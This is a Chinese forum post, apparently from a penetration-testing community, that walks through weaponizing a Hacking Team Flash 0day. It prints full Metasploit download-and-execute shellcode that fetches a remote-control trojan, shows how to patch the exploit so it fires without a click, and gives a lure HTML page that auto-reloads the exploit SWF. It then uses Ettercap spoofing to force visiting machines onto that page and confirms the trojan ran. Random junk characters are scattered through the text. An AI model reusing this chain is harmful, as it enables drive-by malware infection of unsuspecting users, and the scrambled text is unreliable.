; m4 j- s7 u H& b; x 三、flash 0day之手工代码修改制作下载者实例入侵演示
% S) }- R+ n g7 p4 X, E% [: i* o: f+ `& d" w 利用到的工具: + M2 k" f4 M; \9 U: g- ]
\% j+ f# s! g6 q; `0 n' m# N Msf
Ettercap
Adobe Flash CS6
8 N8 K% f8 f) R+ Z& V# p( r% s4 s& Z9 C, R2 o9 W/ b8 V( V3 v$ | Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
& z: ~9 z; @3 f0 T$ f1 e: j 如图:
1 q& y: }' U% M/ `1 ?9 Z1 G& B0 d6 @+ L' g: M: S% z5 o: Y
- ]7 T: U) J9 b7 i 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / |; @/ D v4 a( n# U
* r& b6 O+ V( a4 _7 `" Q* T1 H' S. e4 p$ h4 V - l0 i: s8 y& k7 ~- K- w6 a: r
! X& J3 D4 B; h+ d/ w/ o0 s
' m9 @8 X3 K1 e. d) [+ z
3 F8 O" N3 ?* K$ ?% O$ n: { 然后执行generate -t dword生成shellcode,如下:
! l/ k& T+ b" @' L0 u( e- q! D0 y6 V5 k/ P
0 p( W" O: l4 b
复制代码到文本下便于我们一会编辑flash exp,如下: . _, n2 n5 v$ o- e9 f6 B
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, # B2 v+ O1 @$ @; U& Z
@ q' m# S1 L4 d& L; g5 Y0 h; F6 Q1 \+ O/ p$ |2 y 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
; Y, h0 @( e/ F$ q; O* n$ M1 l0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 d, {% F e' ^. D7 x
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / Q2 m$ J- `6 p" {8 G( d- C @/ e
. q* d: r- k/ w& n 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / x( Z4 g( p/ H) i% Y3 v& M. z5 p" f
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
* O& c* V: E* ?7 f- j3 p" B7 ^ i6 u. c9 G! _: V 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 8 h, u3 s. ^- p# {0 c
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
6 q$ Y9 @3 B# B: u0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ; u; ~: @$ c8 T& S+ M! I4 a
+ l4 ?5 K$ \( m5 D& D1 N# [4 z, d9 i ^ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ' }/ T% r# d, f r
; U0 s# |, ~ D! ?6 O/ X4 Z4 R! F! a 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 3 D* G, P' c, j
9 z a' G4 h+ u$ V% D0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
! r0 o. a$ `6 ] 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 " X+ J& u# I# M" r8 {$ v$ t" q
b6 t* w; |' c" g7 ], K1 D. V9 ?/ Y3 ?7 L6 v/ q
8 X* v# t! c& R1 U: ^" e" f
+ ?8 Y; N9 s, `7 }: g+ L5 ~& x/ [' W- m4 d8 ^$ C 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 5 ~! T1 S0 g$ F0 E; }( Q
% f. Y. q& ^: Z" o: U5 F
3 ~: ]- o! K- A% t% n6 Y
7 w; i* t7 e. J. d2 Q 先修改ShellWin32.as,部分源代码如图:
8 s7 B" ^% i+ r; H1 k( L4 E9 I6 F3 M+ t! w0 h* ^5 Z
3 O! Y* A' V6 O2 d4 T: o
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 7 m1 f% l, E3 f* R
, v( K% Z3 p" ?' [* S
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: # f5 S$ t5 }$ l$ q; Q# a L
" T) V, b* A4 u& P
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 4 C; O" q- O1 {
4 I) ^7 c6 p$ r( Z: @( k. c0 q- o5 A3 b
6 q: e7 S( ]0 O6 m4 a& y; t% J: I, w
* J+ y. y, q; E: A8 i 然后点保存,下面我们来编译一下,打开 # p6 _" a* H. X9 _+ _* e, C+ c
1 {+ C( R7 P/ a) v9 u: C4 V+ I3 w) } exp1.fla然后点文件-发布,看看编译没错误
8 |$ n- e; a Y6 F1 A. K: u4 Q
! {# V1 D6 y/ n4 w2 q7 {# O1 U: C3 f- ]& i3 b- Q
6 s/ b9 }% ~: q; S
( q8 c+ t a7 m
* l5 B8 l$ n6 t0 u7 h8 L: W
然后我们把生成的
5 ^, W4 ^/ z6 k2 ~+ O' b9 H, J* ?+ |6 G1 `' i4 S1 z exp1.swf丢到kailinux 的/var/www/html下: ; m( N+ Q7 I- T9 p ~& h; B
然后把这段代码好好编辑一下 ( p" F, q- Y7 i+ H+ t7 p* d
' k: R1 L" p- F' |1 ~: M# ^4 k
- e% W" |% d7 r4 I 4 @$ q- e( a; q; i* K+ K8 k& q
+ H- S4 ]) i9 N/ T) h0 G$ p+ E, R( `
' c( }* U" | Y. m" g* \7 Z: |, c6 }1 f) H$ b2 _: I1 v
" o; i# I2 u7 U: y g% y. e- G' w' z) @ H" b6 M 8 E) C$ K. z! n3 Q# L4 \
! N5 ^2 J* M, |- a+ m/ k; q" G9 V% ]3 f b6 e; H6 g5 A
7 e% s7 _/ b6 X5 }. ^7 }; U# r5 A Q6 D$ ~ <!DOCTYPE html> ! n- f& G- P# m- F% B/ T8 W2 u
$ ?$ Z" Z! i0 A7 n5 D4 j; T0 V2 V8 r5 Z/ W# J* d <html>
<head>
<meta http-equiv="Content-Type" content="text/html;
8 O( z2 M2 q9 Kcharset=utf-8"/> 6 ?- ?. w m% `: J1 U
z& ~8 v5 U5 a) Y( ? G/ ]" N7 S/ v* _& U& j u* h* L </head> : H) U- S, g( `; W: W
: s9 x$ o, k4 v- D/ f& M1 e$ `( H/ j$ s7 o' i <body>
+ ^9 ^. z2 M7 J4 H1 B, }( k# D2 B5 Y# o, w/ ], h# y4 @6 F! ^ <h2> Please wait, the requested page is loading...</h2> . v( U! R% Z1 s8 Y+ \- Y0 h) y# |
& v( ^# a% [+ A" ?; P( ^9 i% |0 k; |. |% @" G3 y' P) u* v <br>
/ c# n! c, W# c* ^" j <OBJECT
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
* ?7 |3 `2 Z6 a" k5 S VALUE="http://192.168.0.109/exp1.swf"></OBJECT> , a: h6 W3 a) I( z
3 j2 }4 u/ Y- Q$ [3 P </body>
<script>
1 T$ |3 V3 L+ R9 r- v1 m7 [, s; J4 X& {. a! M setTimeout(function () {
window.location.reload();
, o# S- L/ A( _* g# y( x }, 10000);
) _3 O( z) n9 e" i3 ?/ C5 z5 Y; M+ {8 K
</script>
# P; K! O9 T- D5 x" Z% W, g</html> ! x' {- y4 Z$ V8 e, T) C
% P4 K$ T2 Y1 \: c _6 c 6 a; K' ~7 w: B R
5 f/ z8 L8 O, F! `1 @8 O \& n M) u8 [1 S 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: * E, r- y$ |1 Q5 G' A8 e5 H5 B
- V! o+ K- E4 W- B9 \' _2 B
+ A( f. f% T0 s
2 \% \' a2 g1 h$ F3 R% v0 T
4 |7 T0 G6 H- @1 ?2 T5 l% w$ s6 X* i7 l
" n4 V* @, R: I1 m6 P # v# S3 y$ B- q" K& ]
3 h8 R# C# E/ e/ }, G : A' W/ N1 ]/ Q
1 n7 K7 J6 z8 R& Or' q" f" [# n. D& |8 i2 i 下面我们用ettercap欺骗如图:
2 _% O' Z& r9 W* y4 t5 K7 P
4 G w4 L* W/ E: f, g E
下面我们随便访问个网站看看:
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
) o2 |' u1 m$ E0 r. A# A: w; U
2 `3 m# r% P8 A* U: q) N7 q. K
6 @- W' b0 Z) M* t: Z0 ? 我们看另一台,
- ]. H1 M# a. r( e
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 * s4 b# l p& c3 E- m9 ~/ y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |